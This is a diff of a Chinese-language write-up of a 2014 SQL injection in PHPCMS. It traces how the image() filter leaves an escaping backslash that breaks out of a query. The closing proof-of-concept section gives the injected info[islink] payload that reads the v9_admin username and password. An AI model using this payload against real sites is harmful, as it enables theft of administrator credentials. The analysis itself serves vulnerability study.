--- a/論PHP常見的漏洞/3.8 WooYun-2014-50636：PHPCMS全版本通殺SQL注入漏洞.md
+++ b/論PHP常見的漏洞/3.8 WooYun-2014-50636：PHPCMS全版本通殺SQL注入漏洞.md
@@ -1,11 +1,7 @@
 ## WooYun-2014-50636：PHPCMS全版本通殺SQL注入漏洞
 
-### 漏洞產生
-
-總的來說，是因為你們修復不完善，並沒有理解到這個SQL注入的真正原因，同時補丁後並沒有進行相應的測試因而可繞過補丁繼續注入...
-
 ### 漏洞分析
-首先看下面的代碼
+首先看下面的程式碼
 /phpcms/modules/member/content.php 202行編輯函數
 
 ```php
@@ -86,11 +82,10 @@ $this->content_db->edit_content($_POST['info'],$id);
 ```
 
 
-其中$ _POST ['info']參數是一個數組，其內容是在線投稿的各項內容，如圖所示
+其中$ _POST ['info']參數是一個陣列，其內容是在線投稿的各項內容，如圖所示
 
 ![1](https://raw.githubusercontent.com/dyeat/PDF/master/%E8%AB%96PHP%E5%B8%B8%E8%A6%8B%E7%9A%84%E6%BC%8F%E6%B4%9E/images/3/3.8/3.8-1.jpg)
 
-好了，接下來我們看看這些數據都經過了怎樣的處理？
 跟上edit_content函數
 /phpcms/model/content_model.class.php第234行開始
 
@@ -125,7 +120,8 @@ public function edit_content($data,$id) {
 
         $systeminfo = $inputinfo['system'];
 ```
-第248行，我們可以看到$ _POST ['info']數組進入了get函數，繼續跟進
+第248行，我們可以看到$ _POST ['info']陣列進入了get函數，繼續跟進
+<br />
 /caches/caches_model/caches_data/content_input.class.php第55行開始
 
 ```php
@@ -157,7 +153,7 @@ if($this->fields[$field]['issystem']) {
 ```php
 if(method_exists($this, $func)) $value = $this->$func($field, $value);
 ```
-為了方便看清楚程序在這裡究竟是怎樣處理的，我們在這行代碼前面加入以下調試代碼，看看都經過了哪些函數的處理...
+為了方便看清楚程式在這裡究竟是怎樣處理的，我們在這行程式碼前面加入以下調試程式碼，看看都經過了哪些函數的處理...
 
 ```php
 if($pattern && $length && !preg_match($pattern, $value) && !$isimport) showmessage($errortips);
@@ -170,7 +166,7 @@ if($this->fields[$field]['isunique'] && $this->db->get_one(array($field=>$value)
 
 $func = $this->fields[$field]['formtype'];
 
-echo "<br>Function :-->".$func."<--<br>";//這是添加的調試代碼
+echo "<br>Function :-->".$func."<--<br>";//這是添加的調試程式碼
 
 if(method_exists($this, $func)) $value = $this->$func($field, $value);//這裡是關鍵，後面慢慢說明
 
@@ -190,8 +186,9 @@ if($this->fields[$field]['issystem']) {
 ![2](https://raw.githubusercontent.com/dyeat/PDF/master/%E8%AB%96PHP%E5%B8%B8%E8%A6%8B%E7%9A%84%E6%BC%8F%E6%B4%9E/images/3/3.8/3.8-2.jpg)
 
 
-看見了吧，我們提交的內容經過瞭如下幾個函數：catid title keyword copyform textarea editor image islink box
-經過分析後，我們重點關注圖像函數，繼續跟上
+提交的內容經過瞭如下幾個函數：`catid`、`title`、`keyword`、`copyform`、`textarea`、`editor`、`image`、`islink`、`box`
+經過分析後，重點關注圖像函數，繼續跟上
+<br />
 /caches/caches_model/caches_data/content_input.class.php第102行圖像函數
 
 
@@ -204,27 +201,29 @@ function image($field, $value) {
 
 }
 ```
-過濾了"'"，"（"，"）"，但是呢我們知道當開啟了GPC的時候，單引號會被轉義' - > \'
-明白了吧？圖像函數過濾了單引號，假設我們提交的數據恰巧經過了圖像函數，則單引號被過濾了，留下"\"，那麼這個"\"將會吃掉一個單引號，造成注入
+過濾了"'"，"（"，"）"，當開啟了GPC的時候，單引號會被轉義' - > \'
+圖像函數過濾了單引號，假設提交的資料恰巧經過了圖像函數，則單引號被過濾了，留下"\"，那麼這個"\"將會吃掉一個單引號，造成注入
 
 
 ### 3. 漏洞Poc
 
-條件：後台開啟投稿，並要求審核
+條件：後台開啟投稿，並要求審核<br />
 **Step1在會員中心隨便投一篇文章，提交**
 
 **Step2點擊編輯，如下**
 ![3](https://raw.githubusercontent.com/dyeat/PDF/master/%E8%AB%96PHP%E5%B8%B8%E8%A6%8B%E7%9A%84%E6%BC%8F%E6%B4%9E/images/3/3.8/3.8-3.jpg)
+<br />
 **Step3在縮略圖欄填入http：//**.**.**.**/sql.jpg'，如圖**
 ![7](https://raw.githubusercontent.com/dyeat/PDF/master/%E8%AB%96PHP%E5%B8%B8%E8%A6%8B%E7%9A%84%E6%BC%8F%E6%B4%9E/images/3/3.8/3.8-7.jpg)
 
-提交後，報錯...
-
+提交後，報錯
+<br />
 ![4](https://raw.githubusercontent.com/dyeat/PDF/master/%E8%AB%96PHP%E5%B8%B8%E8%A6%8B%E7%9A%84%E6%BC%8F%E6%B4%9E/images/3/3.8/3.8-4.jpg)
 
 ### 漏洞最終利用Exp
 
-在縮略圖欄填入：http://**.**.**.**/sql.jpg'
+在縮略圖欄填入：
+<pre>http://**.**.**.**/sql.jpg'</pre>
 
 點擊提交，採用Tamper data抓包修改，將info[islink]修改為
 
@@ -232,10 +231,11 @@ function image($field, $value) {
 ,title=(select concat(username,password) from v9_admin where userid=1) -- felixk3y
 ```
 
-點擊確定，再點編輯 即可讀取管理員賬號 密碼，如圖
+點擊確定，再點編輯 即可讀取管理員帳號 密碼，如圖
 
 ![5](https://raw.githubusercontent.com/dyeat/PDF/master/%E8%AB%96PHP%E5%B8%B8%E8%A6%8B%E7%9A%84%E6%BC%8F%E6%B4%9E/images/3/3.8/3.8-5.jpg)
-
+<br />
 ### 漏洞證明
+<br />
 
 ![6](https://raw.githubusercontent.com/dyeat/PDF/master/%E8%AB%96PHP%E5%B8%B8%E8%A6%8B%E7%9A%84%E6%BC%8F%E6%B4%9E/images/3/3.8/3.8-6.jpg)
